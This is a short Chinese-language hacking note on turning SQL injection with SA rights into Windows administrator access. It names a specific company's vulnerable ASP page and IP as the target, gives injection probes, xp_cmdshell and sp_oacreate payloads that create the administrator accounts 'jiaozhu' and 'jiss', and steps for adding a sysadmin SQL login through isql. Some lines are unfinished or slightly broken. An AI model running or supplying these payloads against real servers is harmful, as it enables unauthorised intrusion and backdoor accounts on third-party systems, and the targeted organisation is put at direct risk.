SA权限添加管理员帐号的SQL命令

注入点:http://www.enzymotec.com/Page.asp cc=0102041102 IP:192.117.122.145 以色列 inurl:asp
具体脚本命令:
1.判断是否有注入;and 1=1 ;and 1=2
;and user_name()='dbo' 判断当前系统的连接用户是不是sa
2.添加系统的管理员
;exec master.dbo.xp_cmdshell 'net user jiaozhu jiaozhu /add';--
;exec master.dbo.xp_cmdshell 'net localgroup administrators jiaozhu /add';--


declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c
这段命令是通过SQL执行系统命令的
例如:
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user jiss 111 /add'
这段命令是通过SQL执行系统命令的


命令行下添加SQL用户的方法
需要有管理员权限,在命令下先建立一个c:\test.qry文件,内容如下:
exec master.dbo.sp_addlogin test,123
EXEC sp_addsrvrolemember 'test, 'sysadmin'
然后在DOS下执行:cmd.exe /c isql -E /U alma /P /i c:\test.qry